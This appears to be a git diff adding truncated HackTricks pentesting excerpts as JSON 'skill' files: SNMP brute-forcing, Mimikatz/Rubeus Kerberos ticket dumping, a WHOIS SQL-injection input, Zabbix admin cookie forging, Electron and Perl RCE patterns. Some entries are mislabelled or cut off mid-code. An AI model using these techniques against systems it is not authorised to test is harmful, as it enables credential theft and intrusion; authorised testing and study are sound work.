+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/5000-pentesting-docker-registry.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_3a870401a525.json b/skills/network_services_pentesting_3a870401a525.json
new file mode 100644
index 0000000..df771c7
--- /dev/null
+++ b/skills/network_services_pentesting_3a870401a525.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_3a870401a525",
+ "category": "network-services-pentesting",
+ "title": "pentesting irc",
+ "description": "# 194,6667,6660-7000 - Pentesting IRC\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nIRC, initially a **plain text protocol**, was assigned **194/TCP** by IANA but is commonly run on **6667/TCP** and similar ports to avoid needing **root privileges** for operation.\n\nA **nickname** is all that's needed to connect to a server. Following connection, the server performs a reverse-DNS lookup on the user's IP.\n\nUsers are divided into **operators**, who need a **username** and *",
+ "payloads": [
+ "# 194,6667,6660-7000 - Pentesting IRC",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "IRC, initially a **plain text protocol**, was assigned **194/TCP** by IANA but is commonly run on **6667/TCP** and similar ports to avoid needing **root privileges** for operation.",
+ "A **nickname** is all that's needed to connect to a server. Following connection, the server performs a reverse-DNS lookup on the user's IP.",
+ "Users are divided into **operators**, who need a **username** and **password** for more access, and regular **users**. Operators have varying levels of privileges, with administrators at the top.",
+ "**Default ports:** 194, 6667, 6660-7000",
+ "PORT STATE SERVICE",
+ "6667/tcp open irc",
+ "## Enumeration",
+ "### Banner",
+ "IRC can support **TLS**.",
+ "```bash",
+ "nc -vn ",
+ "openssl s_client -connect : -quiet"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-irc.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_3b95a0c83900.json b/skills/network_services_pentesting_3b95a0c83900.json
new file mode 100644
index 0000000..dbcca8b
--- /dev/null
+++ b/skills/network_services_pentesting_3b95a0c83900.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_3b95a0c83900",
+ "category": "network-services-pentesting",
+ "title": "cisco snmp",
+ "description": "# Cisco SNMP\n\n{{#include ../../banners/hacktricks-training.md}}\n\n\n## Pentesting Cisco Networks\n\n**SNMP** functions over UDP with ports **161/UDP** for general messages and **162/UDP** for trap messages. This protocol relies on *community strings*, serving as plaintext \"passwords\" that enable communication between SNMP agents and managers. These strings determine the access level, specifically **read-only (RO) or read-write (RW) permissions**.\n\nA classic\u2014yet still extremely effective\u2014attack vecto",
+ "payloads": [
+ "# Cisco SNMP",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Pentesting Cisco Networks",
+ "**SNMP** functions over UDP with ports **161/UDP** for general messages and **162/UDP** for trap messages. This protocol relies on *community strings*, serving as plaintext \"passwords\" that enable communication between SNMP agents and managers. These strings determine the access level, specifically **read-only (RO) or read-write (RW) permissions**.",
+ "A classic\u2014yet still extremely effective\u2014attack vector is to **brute-force community strings** in order to elevate from unauthenticated user to device administrator (RW community).",
+ "A practical tool for this task is [**onesixtyone**](https://github.com/trailofbits/onesixtyone):",
+ "```bash",
+ "onesixtyone -c community_strings.txt -i targets.txt",
+ "Other fast options are the Nmap NSE script `snmp-brute` or Hydra's SNMP module:",
+ "```bash",
+ "nmap -sU -p161 --script snmp-brute --script-args brute.community=wordlist 10.0.0.0/24",
+ "hydra -P wordlist.txt -s 161 10.10.10.1 snmp",
+ "### Dumping configuration through SNMP (CISCO-CONFIG-COPY-MIB)",
+ "If you obtain an **RW community** you can copy the running-config/startup-config to a TFTP/FTP server *without CLI access* by abusing the CISCO-CONFIG-COPY-MIB (`1.3.6.1.4.1.9.9.96`). Two common approaches are:",
+ "1. **Nmap NSE \u2013 `snmp-ios-config`**"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_3fc55e0eed56.json b/skills/network_services_pentesting_3fc55e0eed56.json
new file mode 100644
index 0000000..334aa03
--- /dev/null
+++ b/skills/network_services_pentesting_3fc55e0eed56.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_3fc55e0eed56",
+ "category": "network-services-pentesting",
+ "title": "zabbix",
+ "description": "# Zabbix Security\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Overview\n\nZabbix is a monitoring platform exposing a web UI (typically behind Apache/Nginx) and a server component that also talks the Zabbix protocol on TCP/10051 (server/trapper) and agent on TCP/10050. During engagements you may encounter:\n\n- Web UI: HTTP(S) virtual host like zabbix.example.tld\n- Zabbix server port: 10051/tcp (JSON over a ZBXD header framing)\n- Zabbix agent port: 10050/tcp\n\nUseful cookie format: zbx_sess",
+ "payloads": [
+ "# Zabbix Security",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Overview",
+ "Zabbix is a monitoring platform exposing a web UI (typically behind Apache/Nginx) and a server component that also talks the Zabbix protocol on TCP/10051 (server/trapper) and agent on TCP/10050. During engagements you may encounter:",
+ "- Web UI: HTTP(S) virtual host like zabbix.example.tld",
+ "- Zabbix server port: 10051/tcp (JSON over a ZBXD header framing)",
+ "- Zabbix agent port: 10050/tcp",
+ "Useful cookie format: zbx_session is Base64 of a compact JSON object that includes at least sessionid, serverCheckResult, serverCheckTime and sign. The sign is an HMAC of the JSON payload.",
+ "## zbx_session cookie internals",
+ "Recent Zabbix versions compute the cookie like:",
+ "- data JSON: {\"sessionid\":\"<32-hex>\",\"serverCheckResult\":true,\"serverCheckTime\":}",
+ "- sign: HMAC-SHA256(key=session_key, data=JSON string of data sorted by keys and compact separators)",
+ "- Final cookie: Base64(JSON_with_sign)",
+ "If you can recover the global session_key and a valid admin sessionid, you can forge a valid Admin cookie offline and authenticate to the UI.",
+ "## CVE-2024-22120 \u2014 Time-based blind SQLi in Zabbix Server audit log"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/zabbix.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_428ca6524f02.json b/skills/network_services_pentesting_428ca6524f02.json
new file mode 100644
index 0000000..99a1d31
--- /dev/null
+++ b/skills/network_services_pentesting_428ca6524f02.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_428ca6524f02",
+ "category": "network-services-pentesting",
+ "title": "49 pentesting tacacs+",
+ "description": "# 49 - Pentesting TACACS+\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nThe **Terminal Access Controller Access Control System (TACACS)** protocol is used to centrally validate users trying to access routers or Network Access Servers (NAS). Its upgraded version, **TACACS+**, separates the services into authentication, authorization, and accounting (AAA).\n\n```\nPORT STATE SERVICE\n49/tcp open tacacs\n```\n\n**Default port:** 49\n\n## Intercept Authentication Key\n\nIf the cli",
+ "payloads": [
+ "# 49 - Pentesting TACACS+",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "The **Terminal Access Controller Access Control System (TACACS)** protocol is used to centrally validate users trying to access routers or Network Access Servers (NAS). Its upgraded version, **TACACS+**, separates the services into authentication, authorization, and accounting (AAA).",
+ "PORT STATE SERVICE",
+ "49/tcp open tacacs",
+ "**Default port:** 49",
+ "## Intercept Authentication Key",
+ "If the client and TACACS server communication is intercepted by an attacker, the **encrypted authentication key can be intercepted**. The attacker can then attempt a **local brute-force attack against the key without being detected in the logs**. If successful in brute-forcing the key, the attacker gains access to the network equipment and can decrypt the traffic using tools like Wireshark.",
+ "### Performing a MitM Attack",
+ "An **ARP spoofing attack can be utilized to perform a Man-in-the-Middle (MitM) attack**.",
+ "### Brute-forcing the Key",
+ "[Loki](https://c0decafe.de/svn/codename_loki/trunk/) can be used to brute force the key:",
+ "sudo loki_gtk.py",
+ "If the key is successfully **bruteforced** (**usually in MD5 encrypted format)**, **we can access the equipment and decrypt the TACACS-encrypted traffic.**"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/49-pentesting-tacacs+.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_4397c963d44c.json b/skills/network_services_pentesting_4397c963d44c.json
new file mode 100644
index 0000000..5f18c9b
--- /dev/null
+++ b/skills/network_services_pentesting_4397c963d44c.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_4397c963d44c",
+ "category": "network-services-pentesting",
+ "title": "1099 pentesting java rmi",
+ "description": "# 1098/1099/1050 - Pentesting Java RMI - RMI-IIOP\n\n{{#include ../banners/hacktricks-training.md}}\n\n\n## Basic Information\n\n_Java Remote Method Invocation_, or _Java RMI_, is an object oriented _RPC_ mechanism that allows an object located in one _Java virtual machine_ to call methods on an object located in another _Java virtual machine_. This enables developers to write distributed applications using an object-oriented paradigm. A short introduction to _Java RMI_ from an offensive perspective ca",
+ "payloads": [
+ "# 1098/1099/1050 - Pentesting Java RMI - RMI-IIOP",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "_Java Remote Method Invocation_, or _Java RMI_, is an object oriented _RPC_ mechanism that allows an object located in one _Java virtual machine_ to call methods on an object located in another _Java virtual machine_. This enables developers to write distributed applications using an object-oriented paradigm. A short introduction to _Java RMI_ from an offensive perspective can be found in [this blackhat talk](https://youtu.be/t_aw1mDNhzI?t=202).",
+ "**Default port:** 1090,1098,1099,1199,4443-4446,8999-9010,9999",
+ "PORT STATE SERVICE VERSION",
+ "1090/tcp open ssl/java-rmi Java RMI",
+ "9010/tcp open java-rmi Java RMI",
+ "37471/tcp open java-rmi Java RMI",
+ "40259/tcp open ssl/java-rmi Java RMI",
+ "Usually, only the default _Java RMI_ components (the _RMI Registry_ and the _Activation System_) are bound to common ports. The _remote objects_ that implement the actual _RMI_ application are usually bound to random ports as shown in the output above.",
+ "_nmap_ has sometimes troubles identifying _SSL_ protected _RMI_ services. If you encounter an unknown ssl service on a common _RMI_ port, you should further investigate.",
+ "## RMI Components",
+ "To put it in simple terms, _Java RMI_ allows a developer to make a _Java object_ available on the network. This opens up a _TCP_ port where clients can connect and call methods on the corresponding object. Despite this sounds simple, there are several challenges that _Java RMI_ needs to solve:",
+ "1. To dispatch a method call via _Java RMI_, clients need to know the IP address, the listening port, the implemented class or interface and the `ObjID` of the targeted object (the `ObjID` is a unique and random identifier that is created when the object is made available on the network. It is required because _Java RMI_ allows multiple objects to listen on the same _TCP_ port)."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/1099-pentesting-java-rmi.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_43be49625990.json b/skills/network_services_pentesting_43be49625990.json
new file mode 100644
index 0000000..f6b7b21
--- /dev/null
+++ b/skills/network_services_pentesting_43be49625990.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_43be49625990",
+ "category": "network-services-pentesting",
+ "title": "electron contextisolation rce via preload code",
+ "description": "# Electron contextIsolation RCE via preload code\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n## Example 1\n\nExample from [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=30](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=30)\n\nThis code open http(s) links with default browser:\n\n.png>)\n\nSomething like `file:///C:/Windows/systemd32/calc.exe` could ",
+ "payloads": [
+ "# Electron contextIsolation RCE via preload code",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "## Example 1",
+ "Example from [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=30](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=30)",
+ "This code open http(s) links with default browser:",
+ ".png>)",
+ "Something like `file:///C:/Windows/systemd32/calc.exe` could be used to execute a calc, the `SAFE_PROTOCOLS.indexOf` is preventing it.",
+ "Therefore, an attacker could inject this JS code via the XSS or arbitrary page navigation:",
+ "```html",
+ "",
+ "As the call to `SAFE_PROTOCOLS.indexOf` will return 1337 always, the attacker can bypass the protection and execute the calc. Final exploit:",
+ "```html"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_45bffd17887b.json b/skills/network_services_pentesting_45bffd17887b.json
new file mode 100644
index 0000000..fbf718c
--- /dev/null
+++ b/skills/network_services_pentesting_45bffd17887b.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_45bffd17887b",
+ "category": "network-services-pentesting",
+ "title": "memcache commands",
+ "description": "# Memcache Commands\n\n{{#include ../../banners/hacktricks-training.md}}\n\n\n## Commands Cheat-Sheet\n\n**From** [**https://lzone.de/cheat-sheet/memcached**](https://lzone.de/cheat-sheet/memcached)\n\nThe supported commands (the official ones and some unofficial) are documented in the [doc/protocol.txt](https://github.com/memcached/memcached/blob/master/doc/protocol.txt) document.\n\nSadly the syntax description isn\u2019t really clear and a simple help command listing the existing commands would be much bette",
+ "payloads": [
+ "# Memcache Commands",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Commands Cheat-Sheet",
+ "**From** [**https://lzone.de/cheat-sheet/memcached**](https://lzone.de/cheat-sheet/memcached)",
+ "The supported commands (the official ones and some unofficial) are documented in the [doc/protocol.txt](https://github.com/memcached/memcached/blob/master/doc/protocol.txt) document.",
+ "Sadly the syntax description isn\u2019t really clear and a simple help command listing the existing commands would be much better. Here is an overview of the commands you can find in the [source](https://github.com/memcached/memcached) (as of 19.08.2016):",
+ "| Command | Description | Example |",
+ "| -------------------- | --------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------- |",
+ "| get | Reads a value | `get mykey` |",
+ "| set | Set a key unconditionally |
set mykey
Ensure to use \\r\\n als line breaks when using Unix CLI tools. For example
printf \"set mykey 0 60 4\\r\\ndata\\r\\n\" | nc localhost 11211 |",
+ "| add | Add a new key | `add newkey 0 60 5` |",
+ "| replace | Overwrite existing key | `replace key 0 60 5` |",
+ "| append | Append data to existing key | `append key 0 60 15` |",
+ "| prepend | Prepend data to existing key | `prepend key 0 60 15` |",
+ "| incr | Increments numerical key value by given number | `incr mykey 2` |"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/11211-memcache/memcache-commands.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_4606ecd611f9.json b/skills/network_services_pentesting_4606ecd611f9.json
new file mode 100644
index 0000000..ee33692
--- /dev/null
+++ b/skills/network_services_pentesting_4606ecd611f9.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_4606ecd611f9",
+ "category": "network-services-pentesting",
+ "title": "8086 pentesting influxdb",
+ "description": "# 8086 - Pentesting InfluxDB\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\n**InfluxDB** is an open-source **time series database (TSDB)** developed by InfluxData. TSDBs are optimized for storing and serving time series data, which consists of timestamp-value pairs. Compared to general-purpose databases, TSDBs provide significant improvements in **storage space** and **performance** for time series datasets. They employ specialized compression algorithms and can be config",
+ "payloads": [
+ "# 8086 - Pentesting InfluxDB",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "**InfluxDB** is an open-source **time series database (TSDB)** developed by InfluxData. TSDBs are optimized for storing and serving time series data, which consists of timestamp-value pairs. Compared to general-purpose databases, TSDBs provide significant improvements in **storage space** and **performance** for time series datasets. They employ specialized compression algorithms and can be configured to automatically remove old data. Specialized database indices also enhance query performance.",
+ "**Default port**: 8086",
+ "PORT STATE SERVICE VERSION",
+ "8086/tcp open http InfluxDB http admin 1.7.5",
+ "## Identify & Version (HTTP)",
+ "- v1.x: `GET /ping` returns status 204 and headers like `X-Influxdb-Version` and `X-Influxdb-Build`.",
+ "- v2.x+: `GET /health` returns JSON with the server version and status. Works without auth.",
+ "```bash",
+ "# v1 banner grab",
+ "curl -i http://:8086/ping",
+ "# v2/compat health",
+ "curl -s http://:8086/health | jq ."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/8086-pentesting-influxdb.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_46e7d50dcf82.json b/skills/network_services_pentesting_46e7d50dcf82.json
new file mode 100644
index 0000000..1b34b9d
--- /dev/null
+++ b/skills/network_services_pentesting_46e7d50dcf82.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_46e7d50dcf82",
+ "category": "network-services-pentesting",
+ "title": "perl tricks",
+ "description": "# PrestaShop\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Perl backticks/qx// sinks in Apache mod_perl handlers (reachability and exploitation)\n\nReal-world pattern: Perl code builds a shell command string and executes it via backticks (or qx//). In a mod_perl AccessHandler, attacker-controlled request components like $r->uri() can flow into that string. If any branch concatenates raw input and then evaluates it with a shell, you get pre-auth RCE.\n\nRisky Perl execution primitives (spawn",
+ "payloads": [
+ "# PrestaShop",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Perl backticks/qx// sinks in Apache mod_perl handlers (reachability and exploitation)",
+ "Real-world pattern: Perl code builds a shell command string and executes it via backticks (or qx//). In a mod_perl AccessHandler, attacker-controlled request components like $r->uri() can flow into that string. If any branch concatenates raw input and then evaluates it with a shell, you get pre-auth RCE.",
+ "Risky Perl execution primitives (spawn a shell when given a single string):",
+ "- Backticks / qx//: my $out = `cmd ...`;",
+ "- system with a single string: system(\"/bin/sh -c '...'\") implicitly",
+ "- open with a pipe: open my $fh, \"cmd |\" or \"| cmd\"",
+ "- IPC::Open3 with a single string",
+ "Minimal vulnerable shape observed in the wild:",
+ "```perl",
+ "sub getCASURL {",
+ "my $exec_cmd = \"...\";",
+ "if ($type eq 'login') {",
+ "$exec_cmd .= $uri; # $uri from $r->uri() \u2192 attacker-controlled"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/perl-tricks.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_470306053246.json b/skills/network_services_pentesting_470306053246.json
new file mode 100644
index 0000000..daecbbd
--- /dev/null
+++ b/skills/network_services_pentesting_470306053246.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_470306053246",
+ "category": "network-services-pentesting",
+ "title": "9200 pentesting elasticsearch",
+ "description": "# 9200 - Pentesting Elasticsearch\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic information\n\nElasticsearch is a **distributed**, **open source** search and analytics engine for **all types of data**. It is known for its **speed**, **scalability**, and **simple REST APIs**. Built on Apache Lucene, it was first released in 2010 by Elasticsearch N.V. (now known as Elastic). Elasticsearch is the core component of the Elastic Stack, a collection of open source tools for data ingestion, en",
+ "payloads": [
+ "# 9200 - Pentesting Elasticsearch",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic information",
+ "Elasticsearch is a **distributed**, **open source** search and analytics engine for **all types of data**. It is known for its **speed**, **scalability**, and **simple REST APIs**. Built on Apache Lucene, it was first released in 2010 by Elasticsearch N.V. (now known as Elastic). Elasticsearch is the core component of the Elastic Stack, a collection of open source tools for data ingestion, enrichment, storage, analysis, and visualization. This stack, commonly referred to as the ELK Stack, also includes Logstash and Kibana, and now has lightweight data shipping agents called Beats.",
+ "### What is an Elasticsearch index?",
+ "An Elasticsearch **index** is a collection of **related documents** stored as **JSON**. Each document consists of **keys** and their corresponding **values** (strings, numbers, booleans, dates, arrays, geolocations, etc.).",
+ "Elasticsearch uses an efficient data structure called an **inverted index** to facilitate fast full-text searches. This index lists every unique word in the documents and identifies the documents in which each word appears.",
+ "During the indexing process, Elasticsearch stores the documents and constructs the inverted index, allowing for near real-time searching. The **index API** is used to add or update JSON documents within a specific index.",
+ "**Default port**: 9200/tcp",
+ "## Manual Enumeration",
+ "### Banner",
+ "The protocol used to access Elasticsearch is **HTTP**. When you access it via HTTP you will find some interesting information: `http://10.10.10.115:9200/`",
+ ".png>)",
+ "If you don't see that response accessing `/` see the following section.",
+ "### Authentication"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/9200-pentesting-elasticsearch.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_4718c29004a2.json b/skills/network_services_pentesting_4718c29004a2.json
new file mode 100644
index 0000000..d7cd217
--- /dev/null
+++ b/skills/network_services_pentesting_4718c29004a2.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_4718c29004a2",
+ "category": "network-services-pentesting",
+ "title": "43 pentesting whois",
+ "description": "# 43 - Pentesting WHOIS\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nThe **WHOIS** protocol serves as a standard method for **inquiring about the registrants or holders of various Internet resources** through specific databases. These resources encompass domain names, blocks of IP addresses, and autonomous systems, among others. Beyond these, the protocol finds application in accessing a broader spectrum of information.\n\n**Default port:** 43\n\n```\nPORT STATE SERVICE\n4",
+ "payloads": [
+ "# 43 - Pentesting WHOIS",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "The **WHOIS** protocol serves as a standard method for **inquiring about the registrants or holders of various Internet resources** through specific databases. These resources encompass domain names, blocks of IP addresses, and autonomous systems, among others. Beyond these, the protocol finds application in accessing a broader spectrum of information.",
+ "**Default port:** 43",
+ "PORT STATE SERVICE",
+ "43/tcp open whois?",
+ "## Enumerate",
+ "Get all the information that a whois service has about a domain:",
+ "```bash",
+ "whois -h -p \"domain.tld\"",
+ "echo \"domain.ltd\" | nc -vn ",
+ "Notice than sometimes when requesting for some information to a WHOIS service the database being used appears in the response:",
+ ".png>)",
+ "Also, the WHOIS service always needs to use a **database** to store and extract the information. So, a possible **SQLInjection** could be present when **querying** the database from some information provided by the user. For example doing: `whois -h 10.10.10.155 -p 43 \"a') or 1=1#\"` you could be able to **extract all** the **information** saved in the database."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/43-pentesting-whois.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_4728b93071ab.json b/skills/network_services_pentesting_4728b93071ab.json
new file mode 100644
index 0000000..b4a7b89
--- /dev/null
+++ b/skills/network_services_pentesting_4728b93071ab.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_4728b93071ab",
+ "category": "network-services-pentesting",
+ "title": "harvesting tickets from windows",
+ "description": "# Harvesting tickets from Windows\n\n{{#include ../../banners/hacktricks-training.md}}\n\nTickets in Windows are managed and stored by the **lsass** (Local Security Authority Subsystem Service) process, responsible for handling security policies. To extract these tickets, it's necessary to interface with the lsass process. A non-administrative user can only access their own tickets, while an administrator has the privilege to extract all tickets on the system. For such operations, the tools **Mimika",
+ "payloads": [
+ "# Harvesting tickets from Windows",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "Tickets in Windows are managed and stored by the **lsass** (Local Security Authority Subsystem Service) process, responsible for handling security policies. To extract these tickets, it's necessary to interface with the lsass process. A non-administrative user can only access their own tickets, while an administrator has the privilege to extract all tickets on the system. For such operations, the tools **Mimikatz** and **Rubeus** are widely employed, each offering different commands and functionalities.",
+ "### Mimikatz",
+ "Mimikatz is a versatile tool that can interact with Windows security. It's used not only for extracting tickets but also for various other security-related operations.",
+ "```bash",
+ "# Extracting tickets using Mimikatz",
+ "sekurlsa::tickets /export",
+ "### Rubeus",
+ "Rubeus is a tool specifically tailored for Kerberos interaction and manipulation. It's used for ticket extraction and handling, as well as other Kerberos-related activities.",
+ "```bash",
+ "# Dumping all tickets using Rubeus",
+ ".\\Rubeus dump",
+ "[IO.File]::WriteAllBytes(\"ticket.kirbi\", [Convert]::FromBase64String(\"\"))",
+ "# Listing all tickets"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_482d5625ef50.json b/skills/network_services_pentesting_482d5625ef50.json
new file mode 100644
index 0000000..1584efa
--- /dev/null
+++ b/skills/network_services_pentesting_482d5625ef50.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_482d5625ef50",
+ "category": "network-services-pentesting",
+ "title": "700 pentesting epp",
+ "description": "# 700 - Pentesting EPP\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nThe Extensible Provisioning Protocol (EPP) is a network protocol used for the **management of domain names and other internet resources** by domain name registries and registrars. It enables the automation of domain name registration, renewal, transfer, and deletion processes, ensuring a standardized and secure communication framework between different entities in the domain name system (DNS). EPP is de",
+ "payloads": [
+ "# 700 - Pentesting EPP",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "The Extensible Provisioning Protocol (EPP) is a network protocol used for the **management of domain names and other internet resources** by domain name registries and registrars. It enables the automation of domain name registration, renewal, transfer, and deletion processes, ensuring a standardized and secure communication framework between different entities in the domain name system (DNS). EPP is designed to be flexible and extensible, allowing for the addition of new features and commands as the needs of the internet infrastructure evolve.",
+ "Basically, it's one of the protocols a **TLD registrar is going to be offering to domain registrars** to register new domains in the TLD.",
+ "### Pentest",
+ "[**In this very interesting article**](https://hackcompute.com/hacking-epp-servers/) you can see how some security researches found several **implementation of this protocol** were vulnerable to XXE (XML External Entity) as this protocol uses XML to communicate, which would have allowed attackers to takeover tens of different TLDs.",
+ "## Enumeration & Recon",
+ "EPP servers almost always listen on TCP `700/tcp` over TLS. A typical deployment also enforces **mutual-TLS (mTLS)** so the client must present a valid certificate issued by the registry CA. Nevertheless, many private test or pre-production deployments forget that control:",
+ "```bash",
+ "# Banner-grabbing / TLS inspection",
+ "nmap -p700 --script ssl-cert,ssl-enum-ciphers ",
+ "# Check if mTLS is *really* required (it frequently is not!)",
+ "openssl s_client -connect :700 -quiet \\",
+ "-servername epp.test 2>/dev/null | head"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/700-pentesting-epp.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_4a062f4db967.json b/skills/network_services_pentesting_4a062f4db967.json
new file mode 100644
index 0000000..5d0868f
--- /dev/null
+++ b/skills/network_services_pentesting_4a062f4db967.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_4a062f4db967",
+ "category": "network-services-pentesting",
+ "title": "web api pentesting",
+ "description": "# Web API Pentesting\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## API Pentesting Methodology Summary\n\nPentesting APIs involves a structured approach to uncovering vulnerabilities. This guide encapsulates a comprehensive methodology, emphasizing practical techniques and tools.\n\n### **Understanding API Types**\n\n- **SOAP/XML Web Services**: Utilize the WSDL format for documentation, typically found at `?wsdl` paths. Tools like **SOAPUI** and **WSDLer** (Burp Suite Extension) are instrumen",
+ "payloads": [
+ "# Web API Pentesting",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## API Pentesting Methodology Summary",
+ "Pentesting APIs involves a structured approach to uncovering vulnerabilities. This guide encapsulates a comprehensive methodology, emphasizing practical techniques and tools.",
+ "### **Understanding API Types**",
+ "- **SOAP/XML Web Services**: Utilize the WSDL format for documentation, typically found at `?wsdl` paths. Tools like **SOAPUI** and **WSDLer** (Burp Suite Extension) are instrumental for parsing and generating requests. Example documentation is accessible at [DNE Online](http://www.dneonline.com/calculator.asmx).",
+ "- **REST APIs (JSON)**: Documentation often comes in WADL files, yet tools like [Swagger UI](https://swagger.io/tools/swagger-ui/) provide a more user-friendly interface for interaction. **Postman** is a valuable tool for creating and managing example requests.",
+ "- **GraphQL**: A query language for APIs offering a complete and understandable description of the data in your API.",
+ "### **Practice Labs**",
+ "- [**VAmPI**](https://github.com/erev0s/VAmPI): A deliberately vulnerable API for hands-on practice, covering the OWASP top 10 API vulnerabilities.",
+ "### **Effective Tricks for API Pentesting**",
+ "- **SOAP/XML Vulnerabilities**: Explore XXE vulnerabilities, although DTD declarations are often restricted. CDATA tags may allow payload insertion if the XML remains valid.",
+ "- **Privilege Escalation**: Test endpoints with varying privilege levels to identify unauthorized access possibilities.",
+ "- **CORS Misconfigurations**: Investigate CORS settings for potential exploitability through CSRF attacks from authenticated sessions.",
+ "- **Endpoint Discovery**: Leverage API patterns to discover hidden endpoints. Tools like fuzzers can automate this process."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/web-api-pentesting.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_4b6bcae07e0a.json b/skills/network_services_pentesting_4b6bcae07e0a.json
new file mode 100644
index 0000000..ca010f0
--- /dev/null
+++ b/skills/network_services_pentesting_4b6bcae07e0a.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_4b6bcae07e0a",
+ "category": "network-services-pentesting",
+ "title": "moodle",
